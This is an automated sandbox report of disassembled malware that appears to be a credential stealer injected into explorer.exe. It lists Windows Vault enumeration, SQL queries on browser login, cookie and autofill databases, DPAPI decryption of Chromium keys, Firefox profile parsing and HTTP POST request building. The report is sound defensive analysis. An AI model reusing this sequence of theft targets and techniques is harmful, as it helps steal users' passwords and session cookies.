Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
• String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
• API String ID: 584740257-404540950
• Opcode ID: a1e446594a42fe15f22c4ef312875051eb6569a3ddccba451011895d12c284d3
• Instruction ID: 69959ee1583b588c8bf29e1dc3b3d07e47e606536cf627a23b50dd6f653c8a00
• Opcode Fuzzy Hash: a1e446594a42fe15f22c4ef312875051eb6569a3ddccba451011895d12c284d3
• Instruction Fuzzy Hash: 76E1DA72208349AFDB11EF64E980A6FBBEDBF85344F44892CF88187291DB75C905CB52

Control-flow Graph

Graph rendering for the function at a02198 not reproduced (block and edge data and the Executed / Not Executed colouring are lost in the text dump). Basic blocks with API or call references: a02198-a021c9 RtlZeroMemory, GetVersionExW; a021e3-a021f6 LoadLibraryW; a021fc-a0223e GetProcAddress * 5; a022e1-a022f1 and a02365-a02375 RtlCompareMemory (two item-type checks inside the a022c9-a022db loop); a022f7-a02348 and a0237b-a023c9 call a01953 * 3; a0234e-a02363 and a023cb-a023dc call a01953; a023f8-a02406 StrStrIW; a02408-a02421 call a017c0 * 3; a02435-a02437, a02440-a02442 and a0244b-a0244d call a01011; a02492-a0249a FreeLibrary.

APIs
• RtlZeroMemory.NTDLL(?,00000114), ref: 00A021AF
• GetVersionExW.KERNEL32(?), ref: 00A021BE
• LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 00A021E8
• GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00A0220A
• GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00A02214
• GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00A02220
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00A0222A
• GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00A02236
• RtlCompareMemory.NTDLL(?,00A61110,00000010), ref: 00A022E8
• RtlCompareMemory.NTDLL(?,00A61110,00000010), ref: 00A0236C
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
• StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00A023FE
• FreeLibrary.KERNELBASE(00000000), ref: 00A02493
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
• String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
• API String ID: 2583887280-2831467701
• Opcode ID: d7ac2ff0d562dc08236156a0c45ea9113a3c6a9d1380783bde8caba70868d8b6
• Instruction ID: 57d3d2fc1566184f3b9058796bbc47eae0db68328239165378dae997ce9a6e61
• Opcode Fuzzy Hash: d7ac2ff0d562dc08236156a0c45ea9113a3c6a9d1380783bde8caba70868d8b6
• Instruction Fuzzy Hash: 1691AE71A08308AFD718DF61E898A6FBBE5BFC8744F40882DF98597291DB71D805CB42

Control-flow Graph (function at a03098; graph rendering not reproduced here)
APIs
  • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
  • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
• GetTempPathW.KERNEL32(00000104,00000000), ref: 00A030F9
• GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A03103
• DeleteFileW.KERNELBASE(00000000), ref: 00A0310A
• CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00A03115
• RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00A031A4
• RtlZeroMemory.NTDLL(?,00000040), ref: 00A031D7
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A032DF
• DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A0339C
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
• String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
• API String ID: 2757140130-4052020286
• Opcode ID: e3d67798678643c17f017793a768b05d389f4096b58fe238176082fc4ef4abe6
• Instruction ID: a6f723d053e920089cfd913b603e9c50874b0f74a2f9f2a13970e41ec4bd4b91
• Opcode Fuzzy Hash: e3d67798678643c17f017793a768b05d389f4096b58fe238176082fc4ef4abe6
• Instruction Fuzzy Hash: 1D91A972208349AFDB10DF65E984AAFBBE9AFC9744F04492DF58597290DB30DE048B12

Control-flow Graph (function at a03ed9; graph rendering not reproduced here)
APIs
  • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
  • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
• PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00A03F0A
• FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00A03F16
• lstrcmpiW.KERNEL32(?,00A562CC), ref: 00A03F38
• lstrcmpiW.KERNEL32(?,00A562D0), ref: 00A03F4C
• PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00A03F69
• lstrcmpiW.KERNEL32(?,Local State), ref: 00A03F7E
• PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00A03F9B
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A03FB5
• FindClose.KERNELBASE(00000000), ref: 00A03FC4
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
• String ID: *.*$Local State
• API String ID: 3923353463-3324723383
• Opcode ID: a73d680186262ad36600e6f471727e133b602ec977b71f52f3542015ef5ee8fb
• Instruction ID: b0301640ea8f5a283a7b1998b16c42b131cc5cf517b725f640c0117fa32f0144
• Opcode Fuzzy Hash: a73d680186262ad36600e6f471727e133b602ec977b71f52f3542015ef5ee8fb
• Instruction Fuzzy Hash: 3A21B3326007497BDB10BB70AC48ABF76BCBB81752F440629F952C71D2DB7499498661

Control-flow Graph (function at a02b15; graph rendering not reproduced here)
APIs
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
• FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00A02B3D
• lstrcmpiW.KERNEL32(?,00A562CC), ref: 00A02B63
• lstrcmpiW.KERNEL32(?,00A562D0), ref: 00A02B7B
  • Part of subcall function 00A019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A019C4
• StrStrIW.SHLWAPI(00000000,logins.json), ref: 00A02BE7
• StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00A02C16
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A02C43
• FindClose.KERNELBASE(00000000), ref: 00A02C52
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
• String ID: \*.*$cookies.sqlite$logins.json
• API String ID: 1108783765-3717368146
• Opcode ID: e078a2760dc3f581c7c545a66e1981797de6b468a2509a821d4f68218893905d
• Instruction ID: 5d9d3b948cc3f0a73044c1278014899ae968b6b50299c1d6c38b5b472a9fe85f
• Opcode Fuzzy Hash: e078a2760dc3f581c7c545a66e1981797de6b468a2509a821d4f68218893905d
• Instruction Fuzzy Hash: A2319E307043095BDB14AF70A999BBF739ABB84745F444A2CF946D32C2EB79CD069352

Control-flow Graph (function at a01d4a; graph rendering not reproduced here)
APIs
  • Part of subcall function 00A019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A019C4
• FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00A01DA9
• lstrcmpiW.KERNEL32(?,00A562CC), ref: 00A01DCF
• lstrcmpiW.KERNEL32(?,00A562D0), ref: 00A01DE7
• lstrcmpiW.KERNEL32(?,?), ref: 00A01E62
  • Part of subcall function 00A01CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02C27), ref: 00A01D02
  • Part of subcall function 00A01CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00A01D0D
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A01E94
• FindClose.KERNELBASE(00000000), ref: 00A01EA3
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
• String ID: *.*$\*.*
• API String ID: 232625764-1692270452
• Opcode ID: 42891e062222e5636adfb302bab74e24e36bde6853783ac28f07f3015754ea83
• Instruction ID: 94311dd7a57292b383d35162122d300122d3e3a9989467d2ba49dff967883967
• Opcode Fuzzy Hash: 42891e062222e5636adfb302bab74e24e36bde6853783ac28f07f3015754ea83
• Instruction Fuzzy Hash: 2B3182307043499BCB11EB74A998AFF76E9BFC4341F444A29F94A832D1EB35CC498652

Control-flow Graph (function at a03e04; graph rendering not reproduced here)
APIs
  • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
  • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
  • Part of subcall function 00A01C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00A03E1E,00000000,?,00A03FA8), ref: 00A01C46
  • Part of subcall function 00A01C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00A03FA8), ref: 00A01C56
  • Part of subcall function 00A01C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00A03FA8), ref: 00A01C76
  • Part of subcall function 00A01C31: CloseHandle.KERNEL32(00000000,?,00A03FA8), ref: 00A01C91
  • Part of subcall function 00A02FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00A03E30,00000000,00000000,?,00A03FA8), ref: 00A02FC1
  • Part of subcall function 00A02FB1: lstrlen.KERNEL32("encrypted_key":",?,00A03FA8), ref: 00A02FCE
  • Part of subcall function 00A02FB1: StrStrIA.SHLWAPI("encrypted_key":",00A5692C,?,00A03FA8), ref: 00A02FDD
  • Part of subcall function 00A0123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00A03E4B,00000000), ref: 00A0124A
  • Part of subcall function 00A0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01268
  • Part of subcall function 00A0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01295
• RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00A03E74
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A03E9E
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                                      • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                                      • API String ID: 3076719866-957854035
                                                                                                                                                      • Opcode ID: b220322d2c6b0975be7bf5d2f92f08bfb6d8da8380e280c774f9512623b00133
                                                                                                                                                      • Instruction ID: d55e110e1a6a5d618ec36e31e4bd44a939863622278e9d18f6e09830b1c9d9a3
                                                                                                                                                      • Opcode Fuzzy Hash: b220322d2c6b0975be7bf5d2f92f08bfb6d8da8380e280c774f9512623b00133
                                                                                                                                                      • Instruction Fuzzy Hash: C22181726043495BDB11EF68ED80ABFB6EDAF84700F44062EF945D7281EB74CE498792
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00A0116F
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00A04BB6
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00A04BBF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                                      • Opcode ID: 3602a904a33dffd3a23d939f62f212c04c4ade1a3dea33b1a8a253b6d8fcc114
                                                                                                                                                      • Instruction ID: 3eb7aaf41d86b4430bf2b30642496372086f76edc5ed050efdfd2a3643017ffe
                                                                                                                                                      • Opcode Fuzzy Hash: 3602a904a33dffd3a23d939f62f212c04c4ade1a3dea33b1a8a253b6d8fcc114
                                                                                                                                                      • Instruction Fuzzy Hash: C5E0D87180031467C658BB70BD49B8B3B58BF9A361F10C669F356820D0CA31C8418650
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 55fa977d670a08d48b66aafc39f685270713ca3f8f9b0a3e51e206a7aa70c10d
                                                                                                                                                      • Instruction ID: e48330807296c1b1ac046ca7438b3839aa3aec0b09e2c9d40649d32f6fe5e01c
                                                                                                                                                      • Opcode Fuzzy Hash: 55fa977d670a08d48b66aafc39f685270713ca3f8f9b0a3e51e206a7aa70c10d
                                                                                                                                                      • Instruction Fuzzy Hash: D5A002755507045BDD4497F49E0DA2A3518F744703F504744B24587451D96454058721
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemInfo.KERNELBASE(00A620A4,00000001,00000000,0000000A,00A53127,00A028DA,00000000,?), ref: 00A0BFFC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                      • Opcode ID: 5363882874a0cdd3203ef732f48f7198dabc4cc7c7677bce05b9ac4af08bfd45
                                                                                                                                                      • Instruction ID: 2b1d251c94097a26bd9536f8100683d2e6b74f10c253721accc7dad9d2799894
                                                                                                                                                      • Opcode Fuzzy Hash: 5363882874a0cdd3203ef732f48f7198dabc4cc7c7677bce05b9ac4af08bfd45
                                                                                                                                                      • Instruction Fuzzy Hash: 8BE01A3178430875E62037F87E57F1A1A759F81F08F648A15FB10E90CADFD5A1A12026

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 00A03C6A
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A03C76
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00A03C7D
                                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00A03C89
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00A03D2F
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A03D36
                                                                                                                                                      • wsprintfA.USER32 ref: 00A03D55
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A03D61
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00A03D89
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00A03DB2
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A03DED
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                                      • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                                      • API String ID: 2923052733-3488123210
                                                                                                                                                      • Opcode ID: 1b9eafff44b60bb9ecb2d07ff2054349ade7ed9d8bb5f77cdfb8432841720d1b
                                                                                                                                                      • Instruction ID: ff7ee2c6b7f4dd80d1a3f63ee6bf85941b61b30c3ce9c0fa7a5209b0802e3d68
                                                                                                                                                      • Opcode Fuzzy Hash: 1b9eafff44b60bb9ecb2d07ff2054349ade7ed9d8bb5f77cdfb8432841720d1b
                                                                                                                                                      • Instruction Fuzzy Hash: C341D031204309AFDB11BB70AD81E7F7AADFF85745F40482DF942A3292DA35DD068B62

                                                                                                                                                      Control-flow Graph

(Graph rendering not included; the graph covers basic blocks a028f8 through a02ae6 and marks each block as executed or not executed.)
                                                                                                                                                      APIs
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A02AD2
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A029E1
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A029EC
                                                                                                                                                      • wsprintfA.USER32 ref: 00A02A38
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A02A44
                                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A02A6C
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00A02A99
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                                      • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                                      • API String ID: 304071051-2605711689
                                                                                                                                                      • Opcode ID: 10e94f72b88b64d2e4e709ae0007bed3c7fdb457505a8d75a573fadd79a8804f
                                                                                                                                                      • Instruction ID: ad6c17f59840372de5b355ade7f9102988cc80892249744c06e11baeaa2e7c0b
                                                                                                                                                      • Opcode Fuzzy Hash: 10e94f72b88b64d2e4e709ae0007bed3c7fdb457505a8d75a573fadd79a8804f
                                                                                                                                                      • Instruction Fuzzy Hash: F851BE3060434A9BC725EF30A994B7F76DABF85345F44482DF8819B292DB35DC098B52

                                                                                                                                                      Control-flow Graph

(Graph rendering not included; the graph covers basic blocks a02cb5 through a02e2d and marks each block as executed or not executed.)
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                      • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00A02D13
                                                                                                                                                      • StrStrIW.SHLWAPI(00000000,Profile), ref: 00A02D45
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,Path,00A5637C,?,00000FFF,?), ref: 00A02D68
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00A02D7B
                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 00A02DD8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                                      • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                                      • API String ID: 2234428054-4107377610
                                                                                                                                                      • Opcode ID: 4236cdcdce4b462ec602504a7ae8913d65ee9c831e08aebdd6c23af6867eebc7
                                                                                                                                                      • Instruction ID: 6d2b65046eaaea6e709651d9b556c03535bd6315414f43545ea456686e412986
                                                                                                                                                      • Opcode Fuzzy Hash: 4236cdcdce4b462ec602504a7ae8913d65ee9c831e08aebdd6c23af6867eebc7
                                                                                                                                                      • Instruction Fuzzy Hash: 0C31BD3070430A9BDB20AF70A92577FB7A2BFC8340F50482DF946A72D2DE758C469792

                                                                                                                                                      Control-flow Graph: blocks a01333-a015da (graph rendering omitted; legend: Executed / Not Executed)
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                        • Part of subcall function 00A0106C: lstrlen.KERNEL32(00CE63AE,00000000,00000000,00000000,00A01366,771A8A60,00CE63AE,00000000), ref: 00A01074
                                                                                                                                                        • Part of subcall function 00A0106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00CE63AE,00000001,00000000,00000000), ref: 00A01086
                                                                                                                                                        • Part of subcall function 00A012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 00A012B5
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 00A013C2
                                                                                                                                                      • wsprintfW.USER32 ref: 00A014B5
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00A01594
                                                                                                                                                      Strings
                                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 00A014FB
                                                                                                                                                      • POST, xrefs: 00A01465
                                                                                                                                                      • Accept: */*Referer: %S, xrefs: 00A014AF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                                      • Opcode ID: 8bc7865d437174b6b785bf315a7221b7f663b87eaefcf9048485de6828ecc9ec
                                                                                                                                                      • Instruction ID: e8faa866ce414427489430d7582fdd4cdbb49fb14b1ba431f313eab5536191cf
                                                                                                                                                      • Opcode Fuzzy Hash: 8bc7865d437174b6b785bf315a7221b7f663b87eaefcf9048485de6828ecc9ec
                                                                                                                                                      • Instruction Fuzzy Hash: 6E7157B0608305AFD750DF64EC84A6BBBE9FB88345F404A2DF995C72A1DB70DD058B52

                                                                                                                                                      Control-flow Graph: blocks a0b1e5-a0b3f0 (graph rendering omitted; legend: Executed / Not Executed)
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 00A0B31D
                                                                                                                                                      • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 00A0B34F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CreateMappingView
                                                                                                                                                      • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                      • API String ID: 3452162329-3826999013
